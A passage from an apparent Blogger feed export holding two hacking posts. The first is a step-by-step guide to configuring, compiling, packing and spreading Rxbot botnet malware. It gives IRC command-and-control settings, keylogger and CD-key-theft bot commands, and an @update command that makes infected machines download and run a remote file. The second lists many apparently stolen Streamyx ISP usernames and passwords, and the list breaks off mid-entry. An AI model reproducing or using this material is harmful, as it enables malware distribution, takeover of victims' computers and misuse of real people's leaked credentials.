href="http://www.mediafire.com/?awmwyidzjz5"&gt;Rxbot 7.6 (212.3 kb)&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;a href="http://rapidshare.com/files/21854222/botsrc7.6rx.rar.html"&gt;Server 2&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;a href="http://www.0daymedia.net/p/files/id/265"&gt;Server 3 (Direct Download)&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both;"&gt;2. You should see an Rxbot 7.6 folder&lt;/div&gt;&lt;div class="separator" style="clear: both;"&gt;3. Open the Rxbot 7.6 &amp;gt; configs.h folder and edit these lines only:&lt;/div&gt;&lt;div class="separator" style="clear: both;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;blockquote class="tr_bq"&gt;char password[] = "Bot_login_pass"; // bot password (Ex: monkey)&lt;br /&gt;char server[] = "aenigma.gotd.org"; // server (Ex: irc.efnet.net)&lt;br /&gt;char serverpass[] = ""; // server password (not usually needed)&lt;br /&gt;char channel[] = "#botz_channel"; // channel that the bot should join&lt;br /&gt;char chanpass[] = "My_channel_pass"; // channel password&lt;/blockquote&gt;&lt;div class="separator" style="clear: both;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both;"&gt;&lt;span class="Apple-style-span" style="color: magenta;"&gt;Optional:&lt;/span&gt;&lt;/div&gt;&lt;blockquote class="tr_bq"&gt;char server2[] = ""; // backup server&lt;br /&gt;char channel2[] = ""; // backup channel&lt;br /&gt;char chanpass2[] = ""; //Backup channel pass&lt;/blockquote&gt;&lt;br /&gt;&lt;b&gt;4.&amp;nbsp;Building your bot: (very easy)&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;1. Make sure Microsoft Visual C++ is open&lt;br /&gt;2. Select "File &amp;gt; Open Workspace"&lt;br /&gt;3. Browse to your Rxbot 7.6 folder and open the rBot.dsw file&lt;br /&gt;4. Right Click "rBot Files" and click Build:&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://img264.imageshack.us/img264/8708/untitled1iy4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="190" src="http://img264.imageshack.us/img264/8708/untitled1iy4.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;5. rBot.exe will be in the Rxbot 7.6 &amp;gt; Debug folder !!!&lt;br /&gt;&lt;br /&gt;YOUR DONE !!!! Now get the rbot and pack it (Use tool in third post and open rbot and click "Protect" and send it to some idiots, Follow tutorial on top to learn how to spread. Some good ways are: Torrents, AIM, Friends, Myspace, School computers, and P2P but there are more ways. ENJOY !&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Command List :&lt;/b&gt;&lt;br /&gt;&lt;a href="http://rapidshare.com/files/21542921/cmands.html"&gt;Download Command List&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Basics:&lt;br /&gt;&lt;blockquote class="tr_bq"&gt;.login botpassword will login bots&lt;br /&gt;.logout will logout bots&lt;br /&gt;.keylog on will turn keylogger on&lt;br /&gt;.getcdkeys will retrieve cdkeys.&lt;br /&gt;Read command list for more&lt;/blockquote&gt;&lt;br /&gt;&lt;b&gt;Download mIRC&lt;/b&gt;&amp;nbsp;&lt;b&gt;:&lt;/b&gt;&lt;br /&gt;&lt;a href="http://mirc.hostaccord.com/mirc621.exe"&gt;mIRC&lt;/a&gt;&lt;br /&gt;&lt;a href="http://mirc.stealth.net/download/mirc621.exe"&gt;Server 2&lt;/a&gt;&lt;br /&gt;&lt;a href="ftp://ftp.psionics.net/mirc621.exe"&gt;Server 3 (FTP)&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;How to secure your bots:&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;Don't be an ~censored~, it is easy to steal bots. All you need is the irc server address and maybe a key.&lt;br /&gt;To steal bots, watch for the @login key one must upload their bot to a direct link (tdotnetwork is execellent)&lt;br /&gt;and update the channel topic and run:&lt;br /&gt;&lt;blockquote class="tr_bq"&gt;@update http://www.mybot.com/download/SMSPRO.exe 82&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;The &lt;a href="http://mybot.com/"&gt;http://mybot.com&lt;/a&gt; is your bot's download link and the 82 can be any number(s)&lt;br /&gt;&lt;br /&gt;Now steal their bots and have them join your channel&lt;br /&gt;To find the server address you need their botnet. Then take their bot and open it in the server editor. Address will be shown and so will password and other needed information.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;To secure your self:&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;It is fairly easy to secure your bots, here is how:&lt;br /&gt;&lt;br /&gt;1. When you are in your right click on your chat window and select "Channel Modes"&lt;br /&gt;2. Make sure these options are checked:&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://img136.imageshack.us/img136/1648/ssdyo5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="230" src="http://img136.imageshack.us/img136/1648/ssdyo5.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;This way no one besides you or another op can set the channel topic&amp;nbsp;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;Note: Setting "Moderated" is good for when you are not there because anyone who is not voiced (+v) or and op (+o) cannot talk. They will still log in and follow commands however there will be no output.&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;b&gt;Good IRC Servers:&lt;/b&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both;"&gt;I would recommend running your botnet on a private server.&amp;nbsp;&lt;/div&gt;&lt;div class="separator" style="clear: both;"&gt;If you would like to setup a botnet on a certain server, do not intrude and make one. Talk to the admin and make sure he know that the IRC server is not doing anything illegal. If an Admin refuses, don't get angry. It is his/her server after all&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4138059781742552827-7372331081716565621?l=d3xt-my.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://d3xt-my.blogspot.com/feeds/7372331081716565621/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://d3xt-my.blogspot.com/2011/11/how-to-create-and-compile-botnets-to.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4138059781742552827/posts/default/7372331081716565621'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4138059781742552827/posts/default/7372331081716565621'/><link rel='alternate' type='text/html' href='http://d3xt-my.blogspot.com/2011/11/how-to-create-and-compile-botnets-to.html' title='How To Create And Compile Botnets To Autohack 1000ds of Systems'/><author><name>Sprawd</name><uri>http://www.blogger.com/profile/08685941326590506202</uri><email>noreply@blogger.com</email><gd:image xmlns:gd='http://schemas.google.com/g/2005' rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_JT7BiL7v2XY/Sqk6rGDBlzI/AAAAAAAAANM/gI_re-jDsLY/s72-c/botnet.gif' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4138059781742552827.post-7012237024583261818</id><published>2011-11-22T03:33:00.000-08:00</published><updated>2011-12-14T22:21:12.794-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Hacked'/><title type='text'>[LIST] Hacked Streamyx Username / Password [LIST]</title><content type='html'>&lt;div style="margin: 5px 20px 20px;"&gt;&lt;div class="smallfont" style="margin-bottom: 2px;"&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://cdn.edwardkhoo.com/wp-content/uploads/2009/01/streamyx_logo.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="81" src="http://cdn.edwardkhoo.com/wp-content/uploads/2009/01/streamyx_logo.jpg" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;List 1 : &lt;input onclick="if (this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display != '') { this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display = ''; this.innerText = ''; this.value = 'Hide'; } else { this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display = 'none'; this.innerText = ''; this.value = 'Show'; }" style="font-size: 10px; margin: 0px; padding: 0px; width: 60px;" type="button" value="Show" /&gt; &lt;/div&gt;&lt;br /&gt;&lt;div class="alt2" style="-moz-background-clip: -moz-initial; -moz-background-inline-policy: -moz-initial; -moz-background-origin: -moz-initial; background: #060606 none repeat scroll 0% 50%; border: 1px inset; color: #7f4500; line-height: 1.5em; margin: 0px; padding: 6px;"&gt;&lt;div style="display: none;"&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;Username:&lt;/span&gt; zakatked@tmnet&lt;br /&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;Password:&lt;/span&gt; password&lt;br /&gt;------------------------------&lt;br /&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;Username:&lt;/span&gt; suppsb@tmnet&lt;br /&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;Password:&lt;/span&gt; TMM001&lt;br /&gt;------------------------------&lt;br /&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;Username:&lt;/span&gt; badlisa@tmnet&lt;br /&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;Password:&lt;/span&gt; kb34234&lt;br /&gt;------------------------------&lt;br /&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;Username:&lt;/span&gt; aicsit@tmnet&lt;br /&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;Password:&lt;/span&gt; ftx123&lt;br /&gt;------------------------------&lt;br /&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;Username:&lt;/span&gt; besttrad@streamyx&lt;br /&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;Password: &lt;/span&gt;abc123&lt;br /&gt;------------------------------&lt;br /&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;Username:&lt;/span&gt; taeknam@streamyx&lt;br /&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;Password:&lt;/span&gt; tm2005&lt;br /&gt;------------------------------&lt;br /&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;Username:&lt;/span&gt; richland@streamyx&lt;br /&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;Password: &lt;/span&gt;051972&lt;br /&gt;------------------------------&lt;br /&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;Username:&lt;/span&gt; jupemkk@streamyx&lt;br /&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;Password:&lt;/span&gt; abc123&lt;br /&gt;------------------------------&lt;br /&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;Username:&lt;/span&gt; justry@streamyx&lt;br /&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;Password:&lt;/span&gt; abc123&lt;br /&gt;------------------------------&lt;br /&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;Username:&lt;/span&gt; likking@streamyx&lt;br /&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;Password:&lt;/span&gt; tmnet123&lt;br /&gt;------------------------------&lt;br /&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;Username:&lt;/span&gt; wtsmpos@streamyx&lt;br /&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;Password:&lt;/span&gt; tmnet123&lt;br /&gt;------------------------------&lt;br /&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;Username:&lt;/span&gt; das29ab@streamyx&lt;br /&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;Password:&lt;/span&gt; tmnet123&lt;br /&gt;------------------------------&lt;br /&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;Username:&lt;/span&gt; denis-fu@streamyx&lt;br /&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;Password:&lt;/span&gt; tmnet123&lt;br /&gt;------------------------------&lt;br /&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;Username:&lt;/span&gt; fivedock@streamyx&lt;br /&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;Password:&lt;/span&gt; tmnet123&lt;br /&gt;------------------------------&lt;br /&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;Username:&lt;/span&gt; lpy1130@streamyx&lt;br /&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;Password:&lt;/span&gt; jl851208&lt;br /&gt;------------------------------&lt;br /&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;Username:&lt;/span&gt; ths5082@streamyx&lt;br /&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;Password:&lt;/span&gt; tm123&lt;br /&gt;------------------------------&lt;br /&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;Username:&lt;/span&gt; ghosting@streamyx&lt;br /&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;Password:&lt;/span&gt; tmtze&lt;br /&gt;------------------------------&lt;br /&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;Username:&lt;/span&gt; nkung@streamyx&lt;br /&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;Password:&lt;/span&gt; tmm123&lt;br /&gt;------------------------------&lt;br /&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;Username:&lt;/span&gt; ytyeo@streamyx&lt;br /&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;Password:&lt;/span&gt; tmnet123&lt;br /&gt;------------------------------&lt;br /&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;Username: &lt;/span&gt;azmihb@streamyx&lt;br /&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;Password:&lt;/span&gt; azmi789&lt;br /&gt;------------------------------&lt;br /&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;Username:&lt;/span&gt; cement04@streamyx&lt;br /&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;Password:&lt;/span&gt; dookie05&lt;br /&gt;------------------------------&lt;br /&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;Username:&lt;/span&gt; ella2387@streamyx&lt;br /&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;Password:&lt;/span&gt; 420994&lt;br /&gt;------------------------------&lt;br /&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;Username: &lt;/span&gt;mylyy@streamyx&lt;br /&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;Password: &lt;/span&gt;yy5192&lt;br /&gt;------------------------------&lt;br /&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;Username:&lt;/span&gt; wwsing@streamyx&lt;br /&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;Password: &lt;/span&gt;password&lt;br /&gt;------------------------------&lt;br /&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;Username:&lt;/span&gt; jmwee@streamyx&lt;br /&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;Password:&lt;/span&gt; jmwee&lt;br /&gt;------------------------------&lt;br /&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;Username:&lt;/span&gt; kong3000@streamyx&lt;br /&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;Password:&lt;/span&gt; tmnet123&lt;br /&gt;------------------------------&lt;br /&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;Username:&lt;/span&gt; bennytbs@streamyx&lt;br /&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;Password: &lt;/span&gt;teobs886&lt;br /&gt;------------------------------&lt;br /&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;Username:&amp;nbsp;&lt;/span&gt;chamml09@streamyx&lt;br /&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;Password:&lt;/span&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;&amp;nbsp;&lt;/span&gt;abc123&lt;br /&gt;------------------------------&lt;br /&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;Username:&amp;nbsp;&lt;/span&gt;ccc512@streamyx&lt;br /&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;Password:&lt;/span&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;&amp;nbsp;&lt;/span&gt;tmnet123&lt;br /&gt;------------------------------&lt;br /&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;Username:&amp;nbsp;&lt;/span&gt;cbb656@streamyx&lt;br /&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;Password:&lt;/span&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;&amp;nbsp;&lt;/span&gt;tmnet123&lt;br /&gt;------------------------------&lt;br /&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;Username:&amp;nbsp;&lt;/span&gt;cye1128@streamyx&lt;br /&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;Password:&lt;/span&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;&amp;nbsp;&lt;/span&gt;531128&lt;br /&gt;------------------------------&lt;br /&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;Username:&amp;nbsp;&lt;/span&gt;cheansen@streamyx&lt;br /&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;Password:&lt;/span&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;&amp;nbsp;&lt;/span&gt;cheanban&lt;br /&gt;------------------------------&lt;br /&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;Username:&amp;nbsp;&lt;/span&gt;azlih@streamyx&lt;br /&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;Password:&lt;/span&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;&amp;nbsp;&lt;/span&gt;t1110684&lt;br /&gt;------------------------------&lt;br /&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;Username:&amp;nbsp;&lt;/span&gt;sun5233@streamyx&lt;br /&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;Password:&lt;/span&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;&amp;nbsp;&lt;/span&gt;tmnet123&lt;br /&gt;------------------------------&lt;br /&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;Username:&amp;nbsp;&lt;/span&gt;suei1972@streamyx&lt;br /&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;Password:&lt;/span&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;&amp;nbsp;&lt;/span&gt;tmnet123&lt;br /&gt;------------------------------&lt;br /&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;Username:&amp;nbsp;&lt;/span&gt;zuhadi75@streamyx&lt;br /&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;Password:&lt;/span&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;&amp;nbsp;&lt;/span&gt;password&lt;br /&gt;------------------------------&lt;br /&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;Username:&amp;nbsp;&lt;/span&gt;kbluesg@streamyx&lt;br /&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;Password:&lt;/span&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;&amp;nbsp;&lt;/span&gt;tmnet123&lt;br /&gt;------------------------------&lt;br /&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;Username:&amp;nbsp;&lt;/span&gt;wet3299@streamyx&lt;br /&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;Password:&lt;/span&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;&amp;nbsp;&lt;/span&gt;dsa789&lt;br /&gt;------------------------------&lt;br /&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;Username:&amp;nbsp;&lt;/span&gt;lzni7872@streamyx&lt;br /&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;Password:&lt;/span&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;&amp;nbsp;&lt;/span&gt;tmnet123&lt;br /&gt;------------------------------&lt;br /&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;Username:&amp;nbsp;&lt;/span&gt;abesan@streamyx&lt;br /&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;Password:&lt;/span&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;&amp;nbsp;&lt;/span&gt;tmnet123&lt;br /&gt;------------------------------&lt;br /&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;Username:&amp;nbsp;&lt;/span&gt;hee5269@streamyx&lt;br /&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;Password:&lt;/span&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;&amp;nbsp;&lt;/span&gt;abc123&lt;br /&gt;------------------------------&lt;br /&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;Username:&amp;nbsp;&lt;/span&gt;zuhal48@streamyx&lt;br /&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;Password:&lt;/span&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;&amp;nbsp;&lt;/span&gt;rugayah&lt;br /&gt;------------------------------&lt;br /&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;Username:&amp;nbsp;&lt;/span&gt;liew_56@streamyx&lt;br /&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;Password:&lt;/span&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;&amp;nbsp;&lt;/span&gt;tmnet123&lt;br /&gt;------------------------------&lt;br /&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;Username:&amp;nbsp;&lt;/span&gt;stenleye@streamyx&lt;br /&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;Password:&lt;/span&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;&amp;nbsp;&lt;/span&gt;tmnet123&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="margin: 5px 20px 20px;"&gt;&lt;div class="smallfont" style="margin-bottom: 2px;"&gt;List 2 &lt;input onclick="if (this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display != '') { this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display = ''; this.innerText = ''; this.value = 'Hide'; } else { this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display = 'none'; this.innerText = ''; this.value = 'Show'; }" style="font-size: 10px; margin: 0px; padding: 0px; width: 60px;" type="button" value="Show" /&gt; &lt;/div&gt;&lt;br /&gt;&lt;div class="alt2" style="-moz-background-clip: -moz-initial; -moz-background-inline-policy: -moz-initial; -moz-background-origin: -moz-initial; background: #060606 none repeat scroll 0% 50%; border: 1px inset; color: #7f4500; line-height: 1.5em; margin: 0px; padding: 6px;"&gt;&lt;div style="display: none;"&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;Username:&amp;nbsp;&lt;/span&gt;mdj09@streamyx&lt;br /&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;Password:&amp;nbsp;&lt;/span&gt;121067&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;Username:&amp;nbsp;&lt;/span&gt;nurhafez@streamyx&lt;br /&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;Password:&amp;nbsp;&lt;/span&gt;tm123&lt;br /&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;Username:&amp;nbsp;&lt;/span&gt;bgf2980@streamyx&lt;br /&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;Password:&amp;nbsp;&lt;/span&gt;tmnet123&lt;br /&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;Username:&amp;nbsp;&lt;/span&gt;cikguyi@streamyx&lt;br /&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;Password:&amp;nbsp;&lt;/span&gt;tmnet123&lt;br /&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;Username:&amp;nbsp;&lt;/span&gt;rumig@streamyx&lt;br /&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;Password:&amp;nbsp;&lt;/span&gt;password&lt;br /&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;Username:&amp;nbsp;&lt;/span&gt;aceo@streamyx&lt;br /&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;Password:&amp;nbsp;&lt;/span&gt;tmnet123&lt;br /&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;Username:&amp;nbsp;&lt;/span&gt;zul869@streamyx&lt;br /&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;Password:&amp;nbsp;&lt;/span&gt;ccccc869&lt;br /&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;Username:&amp;nbsp;&lt;/span&gt;basb_09@streamyx&lt;br /&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;Password:&amp;nbsp;&lt;/span&gt;tmnet123&lt;br /&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;Username:&amp;nbsp;&lt;/span&gt;fizdee@streamyx&lt;br /&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;Password:&amp;nbsp;&lt;/span&gt;tmnet123&lt;br /&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;Username:&amp;nbsp;&lt;/span&gt;gorklet@streamyx&lt;br /&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;Password:&amp;nbsp;&lt;/span&gt;tmnet123&lt;br /&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;Username:&amp;nbsp;&lt;/span&gt;dav65@streamyx&lt;br /&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;Password:&amp;nbsp;&lt;/span&gt;tmnet123&lt;br /&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;Username:&amp;nbsp;&lt;/span&gt;yehern@streamyx&lt;br /&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;Password:&amp;nbsp;&lt;/span&gt;tmnet123&lt;br /&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;Username:&amp;nbsp;&lt;/span&gt;desmord@streamyx&lt;br /&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;Password:&amp;nbsp;&lt;/span&gt;tmnet123&lt;br /&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;Username:&amp;nbsp;&lt;/span&gt;faridatu@streamyx&lt;br /&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;Password:&amp;nbsp;&lt;/span&gt;tmnet123&lt;br /&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;Username:&amp;nbsp;&lt;/span&gt;rpdungun@streamyx&lt;br /&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;Password:&amp;nbsp;&lt;/span&gt;password&lt;br /&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;Username:&amp;nbsp;&lt;/span&gt;nuarr213@streamyx&lt;br /&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;Password:&amp;nbsp;&lt;/span&gt;a0765021&lt;br /&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;Username:&amp;nbsp;&lt;/span&gt;myart@streamyx&lt;br /&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;Password:&amp;nbsp;&lt;/span&gt;benjamin&lt;br /&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;Username:&amp;nbsp;&lt;/span&gt;is5501@streamyx&lt;br /&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;Password:&amp;nbsp;&lt;/span&gt;tmnet123&lt;br /&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;Username:&amp;nbsp;&lt;/span&gt;ah08yu3@streamyx&lt;br /&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;Password:&amp;nbsp;&lt;/span&gt;tmnet123&lt;br /&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;Username:&amp;nbsp;&lt;/span&gt;iptang@streamyx&lt;br /&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;Password:&amp;nbsp;&lt;/span&gt;tmnet123&lt;br /&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;Username:&amp;nbsp;&lt;/span&gt;kenng8@streamyx&lt;br /&gt;&lt;span class="Apple-style-span" style="color: blue;"&gt;Password:&amp;nbsp;&lt;/span&gt;tmnet123&lt;br /&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;Username:&amp;nbsp;&lt;/span&gt;tsl2286@streamyx&lt;br /&gt;&lt;span class="Apple-style-span" style="color: 